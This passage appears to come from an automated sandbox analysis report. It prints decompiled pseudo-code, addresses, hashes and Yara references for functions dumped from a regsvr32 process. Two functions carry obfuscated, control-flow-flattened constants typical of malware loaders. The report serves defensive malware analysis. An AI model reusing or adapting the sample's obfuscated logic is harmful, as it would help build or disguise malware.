												__eax = __si;
												_push(__si);
												_push( *(__ebp + 0xc));
												__eax = E10014F27(__ebx, __ecx, __edi, __esi, __eflags);
												goto L93;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L75;
											case 0x18:
												_push(__esi);
												L75:
												__eax = E1000FB5C(__ebx, __ecx, __ebp);
												L76:
												_push(__eax);
												goto L90;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L79;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L79:
												_push(__eax);
												__eax = E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L93;
											case 0x1b:
												_push(__esi);
												__eax = E1000FB5C(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												L81:
												_push(__eax);
												goto L88;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E1000FB5C(__ebx, __ecx, __ebp, __esi);
												goto L92;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x2a;
												__ecx = __cx;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												 *(__ebp + 0xc) = __ecx;
												if(__eax != 0x2a) {
													_push(__ecx);
													_push(__edx);
													L88:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L106;
												}
												_push(E1000FB5C(__ebx, __ecx, __ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L96;
											case 0x1e:
												_push(__esi);
												L90:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x1f:
												_push(__esi);
												_push( *(__ebp + 0xc));
												__ecx = __edi;
												__eax =  *__ebx();
												goto L2;
											case 0x20:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L42:
												_push(__eax);
												goto L104;
											case 0x21:
												__eax =  *(__ebp + 0xc);
												_push(__esi);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												L92:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L93:
												_push(__eax);
												goto L96;
											case 0x22:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__si);
												L95:
												_push(__eax);
												_push( *(__ebp + 0xc));
												L96:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0x23:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												_push(__si);
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												_push( *(__ebp + 0xc) & 0x0000ffff);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x10) =  *(__ebp + 0xc) & 0x0000ffff;
												L6:
												__eflags = _t185;
												if(_t185 != 0) {
													goto L106;
												}
												goto L39;
											case 0x24:
												goto L106;
											case 0x25:
												__ecx = __edi;
												__eax =  *__ebx();
												__eflags = __eax;
												 *(__ebp - 0x10) = __eax;
												if(__eax == 0) {
													goto L106;
												}
												L39:
												 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
												E1000E808(_t225 - 0x14);
												_t163 = 0;
												__eflags = 0;
												goto L40;
										}
									}
									_t170 =  *(_t225 - 0x18);
									_t58 =  &(_t170[1]);
									 *_t58 = _t170[1] & 0x00000000;
									__eflags =  *_t58;
									E1000E808(_t225 - 0x14);
									goto L39;
								}
								_t173 = _t194;
								__eflags =  *(_t225 + 0x10) - _t173[2];
								if( *(_t225 + 0x10) != _t173[2]) {
									goto L25;
								}
								_t196 = _t173[1];
								 *(_t225 + 0x10) = _t196;
								E1000E808(_t225 - 0x14);
								__eflags = _t196;
								if(_t196 == 0) {
									goto L39;
								}
								__eflags =  *(_t225 + 8) - 0xc000;
								if( *(_t225 + 8) < 0xc000) {
									goto L29;
								}
								goto L102;
							}
							__eflags =  *(_t147 + 0x74);
							if( *(_t147 + 0x74) <= 0) {
								goto L20;
							}
							__eflags = _t189 - 0x200;
							if(_t189 < 0x200) {
								L16:
								__eflags = _t189 - 0x100;
								if(_t189 < 0x100) {
									L18:
									__eflags = _t189 - 0x281 - 0x10;
									if(_t189 - 0x281 > 0x10) {
										goto L20;
									}
									L19:
									_t177 =  *((intOrPtr*)( *( *(_t222 + 0x4c)) + 0x94))(_t189,  *((intOrPtr*)(_t225 + 0xc)), _t224, _t225 - 0x10);
									__eflags = _t177;
									if(_t177 != 0) {
										goto L106;
									}
									goto L20;
								}
								__eflags = _t189 - 0x10f;
								if(_t189 <= 0x10f) {
									goto L19;
								}
								goto L18;
							}
							__eflags = _t189 - 0x209;
							if(_t189 <= 0x209) {
								goto L19;
							}
							goto L16;
						} else {
							_t181 = E100111CF(_t189, _t222, _t222, _t224, _t224 >> 0x10);
							__eflags = _t181;
							if(_t181 != 0) {
								L2:
								 *((intOrPtr*)(_t225 - 0x10)) = 1;
								L106:
								_t160 =  *((intOrPtr*)(_t225 + 0x14));
								if(_t160 != 0) {
									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
								}
								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
								E1000E808(_t225 - 0x14);
								_t163 = 1;
								L40:
								return E10017C60(_t163);
							}
							goto L12;
						}
					}
					_t217 =  *(_t225 + 0x10);
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L39;
					}
					_push(_t225 - 0x10);
					_push(_t217);
					_push( *((intOrPtr*)(_t225 + 0xc)));
					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L6;
				}
				_push( *(_t225 + 0x10));
				_push( *((intOrPtr*)(_t225 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L39;
				}
				goto L2;
			}

0x1001178a
0x1001178a
0x10011791
0x10011796
0x1001179a
0x1001179d
0x100117a4
0x100117ad
0x100117b0
0x100117d4
0x100117d7
0x10011803
0x10011806
0x10011809
0x10011816
0x10011816
0x1001181b
0x1001181e
0x10011834
0x10011834
0x10011837
0x10011839
0x10011888
0x1001188c
0x10011899
0x100118a2
0x100118ad
0x100118b3
0x100118b5
0x100118b8
0x100118e8
0x100118e8
0x100118eb
0x100118f1
0x100118f3
0x10011982
0x10011982
0x10011985
0x00000000
0x00000000
0x100118fb
0x10011902
0x10011904
0x10011906
0x1001194a
0x1001194f
0x1001196d
0x10011972
0x10011974
0x10011976
0x00000000
0x00000000
0x10011958
0x1001195a
0x10011c6b
0x10011c6e
0x10011c73
0x10011c73
0x10011c76
0x10011c76
0x10011c77
0x10011c7a
0x10011c7c
0x10011c7e
0x10011c7e
0x00000000
0x10011c7e
0x10011960
0x10011962
0x10011964
0x10011969
0x10011969
0x1001196c
0x1001196c
0x10011978
0x1001197b
0x1001197d
0x1001197f
0x00000000
0x1001197f
0x10011908
0x1001190b
0x1001190e
0x10011913
0x10011915
0x10011918
0x00000000
0x00000000
0x1001191d
0x10011923
0x10011928
0x10011931
0x10011934
0x10011937
0x00000000
0x00000000
0x1001193d
0x00000000
0x100119c0
0x100119c8
0x00000000
0x00000000
0x100119d2
0x00000000
0x00000000
0x100119ec
0x100119ee
0x100119ee
0x100119f1
0x100119f2
0x100119f5
0x100119f9
0x00000000
0x00000000
0x10011a08
0x10011a0c
0x00000000
0x00000000
0x10011a13
0x100119c9
0x100119c9
0x100119cb
0x00000000
0x00000000
0x10011a16
0x10011a1e
0x10011a21
0x10011a24
0x10011a28
0x10011a2b
0x10011a30
0x10011a32
0x10011a36
0x10011a3a
0x10011a3d
0x10011a42
0x10011a44
0x10011a46
0x10011a49
0x10011a4b
0x10011a50
0x10011a53
0x10011a58
0x10011a5a
0x10011a5c
0x10011a5c
0x10011a5a
0x10011a5f
0x10011a5f
0x10011a62
0x10011a63
0x10011a64
0x10011a67
0x10011a68
0x10011a6a
0x10011a6c
0x10011a70
0x10011a74
0x10011a77
0x10011a7a
0x10011a7e
0x00000000
0x00000000
0x10011a85
0x10011a8d
0x10011a90
0x10011a93
0x10011a96
0x10011a99
0x10011a9a
0x10011a9c
0x10011aa0
0x10011aa2
0x10011aa2
0x10011aa2
0x10011aa6
0x10011aa9
0x10011aa9
0x10011aac
0x10011ab0
0x00000000
0x00000000
0x10011aba
0x10011abd
0x10011abd
0x10011ac0
0x10011ac2
0x00000000
0x00000000
0x10011ad4
0x10011ad7
0x10011ad8
0x00000000
0x00000000
0x00000000
0x00000000
0x10011ae1
0x10011ae7
0x10011ae8
0x10011aeb
0x10011ac7
0x10011ac7
0x10011ac8
0x100119fe
0x100119fe
0x100119ff
0x10011a01
0x00000000
0x00000000
0x10011bee
0x00000000
0x00000000
0x10011af9
0x00000000
0x00000000
0x10011af0
0x10011af2
0x00000000
0x00000000
0x10011b04
0x10011b07
0x10011b08
0x00000000
0x00000000
0x10011b13
0x10011b16
0x10011b19
0x10011b1a
0x00000000
0x00000000
0x10011b27
0x10011b28
0x00000000
0x00000000
0x100119e6
0x10011bef
0x10011bef
0x00000000
0x00000000
0x100119d7
0x100119d9
0x00000000
0x00000000
0x10011b38
0x10011b3f
0x10011b40
0x10011b42
0x10011b45
0x00000000
0x00000000
0x10011b4d
0x10011b50
0x00000000
0x00000000
0x10011b57
0x10011b5a
0x00000000
0x00000000
0x10011b63
0x10011b66
0x10011b69
0x10011b6a
0x10011b6d
0x10011b6e
0x10011b71
0x00000000
0x00000000
0x10011b7b
0x00000000
0x00000000
0x10011b80
0x10011b81
0x10011b81
0x10011b86
0x10011b86
0x00000000
0x00000000
0x10011b8e
0x10011b8f
0x00000000
0x00000000
0x10011b94
0x10011b97
0x10011b9a
0x10011b9d
0x10011b9e
0x10011b9e
0x10011ba2
0x00000000
0x00000000
0x10011ba9
0x10011bad
0x10011bb2
0x10011bb2
0x00000000
0x00000000
0x10011bb8
0x10011bbb
0x10011bbd
0x00000000
0x00000000
0x10011bc4
0x10011bc7
0x10011bca
0x10011bcd
0x10011bd0
0x10011bd3
0x10011bd6
0x10011bd9
0x10011bea
0x10011beb
0x10011bf2
0x10011bf2
0x10011bf4
0x00000000
0x10011bf4
0x10011be1
0x10011be2
0x10011be5
0x00000000
0x00000000
0x10011bfb
0x10011bfc
0x10011bfc
0x10011bfe
0x00000000
0x00000000
0x10011c25
0x10011c26
0x10011c29
0x10011c2b
0x00000000
0x00000000
0x100119b0
0x100119b3
0x100119b6
0x100119b9
0x100119ba
0x100119ba
0x00000000
0x00000000
0x10011c02
0x10011c05
0x10011c06
0x10011c06
0x10011c09
0x10011c09
0x10011c0a
0x10011c0e
0x10011c0e
0x00000000
0x00000000
0x10011c11
0x10011c14
0x10011c17
0x10011c1a
0x10011c1b
0x10011c1b
0x10011c1c
0x10011c1f
0x10011c1f
0x10011c21
0x00000000
0x00000000
0x10011c32
0x10011c35
0x10011c38
0x10011c3b
0x10011c3c
0x10011c40
0x10011c43
0x10011c44
0x10011c48
0x10011c49
0x10011c4b
0x10011c4d
0x100117f6
0x100117f6
0x100117f8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10011c55
0x10011c57
0x10011c59
0x10011c5b
0x10011c5e
0x00000000
0x00000000
0x1001199a
0x1001199a
0x100119a1
0x100119a6
0x100119a6
0x00000000
0x00000000
0x1001193d
0x1001198b
0x1001198e
0x1001198e
0x1001198e
0x10011995
0x00000000
0x10011995
0x100118bd
0x100118bf
0x100118c2
0x00000000
0x00000000
0x100118c4
0x100118ca
0x100118cd
0x100118d2
0x100118d4
0x00000000
0x00000000
0x100118da
0x100118e1
0x00000000
0x00000000
0x00000000
0x100118e3
0x1001183b
0x1001183f
0x00000000
0x00000000
0x10011841
0x10011847
0x10011851
0x10011851
0x10011857
0x10011861
0x10011867
0x1001186a
0x00000000
0x00000000
0x1001186c
0x1001187a
0x10011880
0x10011882
0x00000000
0x00000000
0x00000000
0x10011882
0x10011859
0x1001185f
0x00000000
0x00000000
0x00000000
0x1001185f
0x10011849
0x1001184f
0x00000000
0x00000000
0x00000000
0x10011820
0x1001182b
0x10011830
0x10011832
0x100117c8
0x100117c8
0x10011c81
0x10011c81
0x10011c86
0x10011c8b
0x10011c8b
0x10011c8d
0x10011c94
0x10011c9b
0x100119a8
0x100119ad
0x100119ad
0x00000000
0x10011832
0x1001181e
0x100117d9
0x100117dc
0x100117de
0x00000000
0x00000000
0x100117e9
0x100117ea
0x100117eb
0x100117f0
0x00000000
0x100117f0
0x100117b2
0x100117b7
0x100117c2
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 10011791

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 847c67b569ae70c7004a2ff94c13445d24c1f844b1233d525592bdd62ace00c9
Instruction ID: cc0fde642219aadce896e713a6cb9948d2e0911a96acc08396d26a1a5d665eaf
Opcode Fuzzy Hash: 847c67b569ae70c7004a2ff94c13445d24c1f844b1233d525592bdd62ace00c9
Instruction Fuzzy Hash: 6EF15F74604219EFDB18DF64C890AFE7BE9EF04350F108519F919AF292DB34E981EB61

Uniqueness

Uniqueness Score: -1.00%

Function 100012D0, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E100012D0(intOrPtr __ecx, void* _a4) {
				char _v8;
				signed int _v12;
				char _v20;
				void _v1044;
				intOrPtr _v1048;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t26;
				signed int _t41;

				_t19 =  *0x10057a08; // 0x3643b451
				_v12 = _t19 ^ _t41;
				_v1048 = __ecx;
				_v20 = 0;
				_v8 = 0x10;
				__imp__#17( &_v1044, 0x400, 0, _v1048 + 0x14,  &_v8);
				_v20 = _v1048;
				 *((char*)(_t41 + _v20 - 0x410)) = 0;
				memcpy(_a4,  &_v1044, 0x101 << 2);
				return E100167D5(_a4, _t26, _v12 ^ _t41, _v20,  &_v1044 + 0x202,  &_v1044,  *((intOrPtr*)(_v1048 + 0x24)));
			}

0x100012d9
0x100012e0
0x100012e5
0x100012eb
0x100012f2
0x1000131f
0x10001325
0x1000132b
0x10001341
0x10001355

APIs

recvfrom.WS2_32(?,?,00000400,00000000,?,00000010), ref: 1000131F

Memory Dump Source

Source File: 00000003.00000002.247739741.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.247733678.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247773643.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.247782219.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.247841184.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247850932.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.247858800.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: e3286800183b2fb084681865d01d3168ae5294563589533788e7953d9f8637e2
Instruction ID: bec5cb5057db5f544406cf49396100538fbf28fc5aa5dd8def6f1e45c3881569
Opcode Fuzzy Hash: e3286800183b2fb084681865d01d3168ae5294563589533788e7953d9f8637e2
Instruction Fuzzy Hash: 830112F5A0011C9FDB14CF58CD54BDEB7B8FF88314F4045A9E609A7241D7B4AA84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 040EF840, Relevance: 1.5, Strings: 1, Instructions: 210
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E040EF840(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t197;
				void* _t220;
				intOrPtr* _t230;
				void* _t232;
				void* _t252;
				void* _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int* _t264;

				_t230 = _a4;
				_push(_a8);
				_t252 = __ecx;
				_push(_t230);
				_push(__ecx);
				E040EFE29(_t197);
				_v16 = 0x43fd88;
				_t264 =  &(( &_v84)[4]);
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x043fd881;
				_t253 = 0;
				_v36 = 0xa6c090;
				_t232 = 0x483ab52;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 + 0x55d4;
				_v36 = _v36 ^ 0x00005b0b;
				_v48 = 0x2dc4d8;
				_t254 = 0xf;
				_v48 = _v48 / _t254;
				_v48 = _v48 + 0x1bd9;
				_v48 = _v48 ^ 0x0001e475;
				_v80 = 0x1961e0;
				_v80 = _v80 | 0x2e5a3b97;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 >> 4;
				_v80 = _v80 ^ 0x00050c56;
				_v52 = 0x801119;
				_t255 = 0x4c;
				_v52 = _v52 * 0x3b;
				_v52 = _v52 / _t255;
				_v52 = _v52 ^ 0x006b0701;
				_v12 = 0x5b3baf;
				_v12 = _v12 + 0xffffe0d8;
				_v12 = _v12 ^ 0x0050d6d6;
				_v20 = 0xddf3bb;
				_v20 = _v20 + 0x1688;
				_v20 = _v20 ^ 0x00da105f;
				_v84 = 0xb842b2;
				_v84 = _v84 >> 3;
				_t256 = 0x6e;
				_v84 = _v84 * 0x79;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x571ab13d;
				_v56 = 0xc043e1;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x181f9cd5;
				_v56 = _v56 ^ 0x181bbe52;
				_v24 = 0xd2b7cf;
				_v24 = _v24 / _t256;
				_v24 = _v24 ^ 0x00057f60;
				_v60 = 0x8a3800;
				_v60 = _v60 >> 6;
				_v60 = _v60 | 0x8f8b2365;
				_v60 = _v60 ^ 0x8f8e0970;
				_v64 = 0xc9e96d;
				_v64 = _v64 << 0x10;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x2da69c1f;
				_v68 = 0x328e52;
				_v68 = _v68 * 0x66;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0xa1266097;
				_v28 = 0xf9277c;
				_v28 = _v28 << 0xa;
				_v28 = _v28 << 3;
				_v28 = _v28 ^ 0x24e98be4;
				_v72 = 0xc9ae08;
				_v72 = _v72 | 0xbe9fb7a8;
				_v72 = _v72 << 1;
				_v72 = _v72 + 0xffff17b5;
				_v72 = _v72 ^ 0x7db3cb0d;
				_v32 = 0x7a6981;
				_v32 = _v32 ^ 0xd4fdb142;
				_t257 = 0x69;
				_v32 = _v32 / _t257;
				_v32 = _v32 ^ 0x020955a0;
				_v76 = 0x732b21;
				_t258 = 0x5e;
				_v76 = _v76 / _t258;
				_t259 = 0xb;
				_v76 = _v76 / _t259;
				_v76 = _v76 + 0xb8c3;
				_v76 = _v76 ^ 0x0005bc70;
				_v8 = 0x8f6a69;
				_t260 = 0x5d;
				_v8 = _v8 / _t260;
				_v8 = _v8 ^ 0x000b5b39;
				_v40 = 0x75e3f0;
				_t261 = 0x55;
				_v40 = _v40 / _t261;
				_v40 = _v40 + 0xffff98ec;
				_v40 = _v40 ^ 0x0009f0a2;
				_v44 = 0x50946;
				_v44 = _v44 * 0x76;
				_v44 = _v44 + 0xffff2591;
				_v44 = _v44 ^ 0x0253dc14;
				do {
					while(_t232 != 0x483ab52) {
						if(_t232 == 0x71a4461) {
							_t220 = E040EA1C0(_v48, _t232, _v80, _v52, _v12,  &_v4, _v16, _v20, _v84, 0, _t232, _v56, _t252);
							_t264 =  &(_t264[0xc]);
							if(_t220 != 0) {
								_t232 = 0xc565723;
								continue;
							}
						} else {
							if(_t232 == 0xc565723) {
								_push(_t232);
								_push(_t232);
								_t253 = E040DC5D8(_v4);
								_t264 =  &(_t264[3]);
								if(_t253 != 0) {
									_t232 = 0xf0f9d9d;
									continue;
								}
							} else {
								if(_t232 != 0xf0f9d9d) {
									goto L12;
								} else {
									E040EA1C0(_v28, _t232, _v72, _v32, _v76,  &_v4, _v36, _v8, _v40, _t253, _t232, _v44, _t252);
									 *_t230 = _v4;
								}
							}
						}
						L6:
						return _t253;
					}
					_t232 = 0x71a4461;
					L12:
				} while (_t232 != 0xd0fff7e);
				goto L6;
			}

0x040ef844
0x040ef84b
0x040ef84f
0x040ef851
0x040ef853
0x040ef854
0x040ef859
0x040ef861
0x040ef864
0x040ef86b
0x040ef873
0x040ef875
0x040ef87d
0x040ef882
0x040ef887
0x040ef88f
0x040ef897
0x040ef8a5
0x040ef8aa
0x040ef8b0
0x040ef8b8
0x040ef8c0
0x040ef8c8
0x040ef8d0
0x040ef8d5
0x040ef8da
0x040ef8e2
0x040ef8ef
0x040ef8f2
0x040ef8fe
0x040ef902
0x040ef90a
0x040ef912
0x040ef91a
0x040ef922
0x040ef92a
0x040ef932
0x040ef93a
0x040ef942
0x040ef94c
0x040ef94d
0x040ef951
0x040ef956
0x040ef95e
0x040ef966
0x040ef96b
0x040ef973
0x040ef97b
0x040ef989
0x040ef98d
0x040ef995
0x040ef99d
0x040ef9a2
0x040ef9aa
0x040ef9b2
0x040ef9ba
0x040ef9bf
0x040ef9c4
0x040ef9cc
0x040ef9d9
0x040ef9dd
0x040ef9e2
0x040ef9ec
0x040ef9f4
0x040ef9f9
0x040ef9fe
0x040efa06
0x040efa0e
0x040efa16
0x040efa1a
0x040efa22
0x040efa2a
0x040efa32
0x040efa40
0x040efa45
0x040efa4b
0x040efa53
0x040efa5f
0x040efa64
0x040efa6e
0x040efa73
0x040efa79
0x040efa81
0x040efa89
0x040efa95
0x040efa9a
0x040efaa0
0x040efaa8
0x040efab4
0x040efabc
0x040efac0
0x040efac8
0x040efad0
0x040efadd
0x040efae1
0x040efae9
0x040efaf1
0x040efaf1
0x040efaff
0x040efbb5
0x040efbba
0x040efbbf
0x040efbc1
0x00000000
0x040efbc1
0x040efb05
0x040efb0b
0x040efb6d
0x040efb6e
0x040efb78
0x040efb7a
0x040efb7f
0x040efb81
0x00000000
0x040efb81
0x040efb0d
0x040efb13
0x00000000
0x040efb19
0x040efb42
0x040efb51
0x040efb51
0x040efb13
0x040efb0b
0x040efb54
0x040efb5c
0x040efb5c
0x040efbcb
0x040efbcd
0x040efbcd
0x00000000

Strings

!+s, xrefs: 040EFA53

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !+s
API String ID: 0-2041718826
Opcode ID: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
Instruction ID: 4d7ccc31f85cb42b792b0d47fe4cae7fa0d5eb55bef1df0e3e7deb837fe5b698
Opcode Fuzzy Hash: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
Instruction Fuzzy Hash: 9B911072108341AFD358CF66C88991BFBE1FBC4B58F40492DF69696260D3B6D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 040F0A64, Relevance: 1.4, Strings: 1, Instructions: 197
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E040F0A64(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t180;
				void* _t211;
				void* _t212;
				void* _t214;
				void* _t238;
				void* _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int* _t250;

				_push(_a8);
				_t238 = __edx;
				_t212 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t180);
				_v56 = 0xc0d7de;
				_t250 =  &(( &_v76)[4]);
				_v56 = _v56 << 2;
				_v56 = _v56 << 7;
				_t239 = 0;
				_v56 = _v56 ^ 0x81afbc01;
				_t214 = 0xaac46ca;
				_v64 = 0x3a8e28;
				_v64 = _v64 >> 1;
				_v64 = _v64 + 0xe78e;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x000000f0;
				_v16 = 0x168660;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x4000b433;
				_v8 = 0x28d09b;
				_t240 = 0x6c;
				_v8 = _v8 / _t240;
				_v8 = _v8 ^ 0x400060bf;
				_v72 = 0xacfd47;
				_v72 = _v72 ^ 0xaf3d897a;
				_v72 = _v72 << 2;
				_v72 = _v72 >> 1;
				_v72 = _v72 ^ 0x5f2a69ef;
				_v60 = 0xaad3e;
				_v60 = _v60 >> 7;
				_v60 = _v60 + 0x530f;
				_v60 = _v60 ^ 0x00047061;
				_v20 = 0xd1ee8e;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x00058db8;
				_v76 = 0xa228f;
				_t241 = 0x1c;
				_v76 = _v76 / _t241;
				_t242 = 0x30;
				_v76 = _v76 * 0x79;
				_v76 = _v76 | 0xd88c69ec;
				_v76 = _v76 ^ 0xd8a0fe12;
				_v24 = 0xd67a62;
				_v24 = _v24 + 0xffff00ae;
				_v24 = _v24 ^ 0x00d8581e;
				_v40 = 0xcb2b10;
				_v40 = _v40 / _t242;
				_t243 = 0x14;
				_v40 = _v40 / _t243;
				_v40 = _v40 ^ 0x0006cc26;
				_v44 = 0xf09ad;
				_v44 = _v44 << 0xd;
				_v44 = _v44 | 0x1b12e533;
				_v44 = _v44 ^ 0xfb3e9f34;
				_v48 = 0xeb0c29;
				_v48 = _v48 * 0x7b;
				_t244 = 0x65;
				_v48 = _v48 / _t244;
				_v48 = _v48 ^ 0x0113d763;
				_v52 = 0x64962b;
				_v52 = _v52 + 0xfffff671;
				_v52 = _v52 + 0x8f00;
				_v52 = _v52 ^ 0x00671ded;
				_v28 = 0xef32a4;
				_v28 = _v28 + 0xf3f6;
				_t245 = 0x57;
				_v28 = _v28 / _t245;
				_v28 = _v28 ^ 0x000c1b67;
				_v32 = 0x4955c4;
				_v32 = _v32 << 7;
				_t246 = 0x75;
				_v32 = _v32 / _t246;
				_v32 = _v32 ^ 0x005efa9b;
				_v68 = 0x926f14;
				_v68 = _v68 ^ 0x2f6794d2;
				_t247 = 0x7f;
				_v68 = _v68 / _t247;
				_v68 = _v68 + 0xe0be;
				_v68 = _v68 ^ 0x00650f61;
				_v12 = 0xa3b92d;
				_v12 = _v12 + 0xffff94bd;
				_v12 = _v12 ^ 0x00ae9057;
				_v36 = 0x571707;
				_v36 = _v36 << 3;
				_v36 = _v36 + 0xffff7ee3;
				_v36 = _v36 ^ 0x02b89578;
				do {
					while(_t214 != 0x665f559) {
						if(_t214 == 0x8e4e5a6) {
							_push(_t214);
							_push(_t214);
							_t239 = E040DC5D8(_v4 + _v4);
							_t250 =  &(_t250[3]);
							if(_t239 != 0) {
								_t214 = 0x665f559;
								continue;
							}
						} else {
							if(_t214 == 0xa67d5aa) {
								_t211 = E040EC4F8(_v72, _v16 | _v56, _t212, 0, _v60, _v20, _v76, _v24,  &_v4, _t238);
								_t250 =  &(_t250[8]);
								if(_t211 != 0) {
									_t214 = 0x8e4e5a6;
									continue;
								}
							} else {
								if(_t214 != 0xaac46ca) {
									goto L11;
								} else {
									_t214 = 0xa67d5aa;
									continue;
								}
							}
						}
						goto L12;
					}
					E040EC4F8(_v28, _v8 | _v64, _t212, _t239, _v32, _v68, _v12, _v36,  &_v4, _t238);
					_t250 =  &(_t250[8]);
					_t214 = 0xee0867e;
					L11:
				} while (_t214 != 0xee0867e);
				L12:
				return _t239;
			}

0x040f0a6b
0x040f0a6f
0x040f0a71
0x040f0a73
0x040f0a77
0x040f0a78
0x040f0a79
0x040f0a7e
0x040f0a86
0x040f0a89
0x040f0a90
0x040f0a95
0x040f0a97
0x040f0a9f
0x040f0aa4
0x040f0aac
0x040f0ab0
0x040f0ab8
0x040f0abd
0x040f0ac5
0x040f0acd
0x040f0ad2
0x040f0ada
0x040f0ae8
0x040f0aed
0x040f0af3
0x040f0afb
0x040f0b03
0x040f0b0b
0x040f0b10
0x040f0b14
0x040f0b1c
0x040f0b24
0x040f0b29
0x040f0b31
0x040f0b39
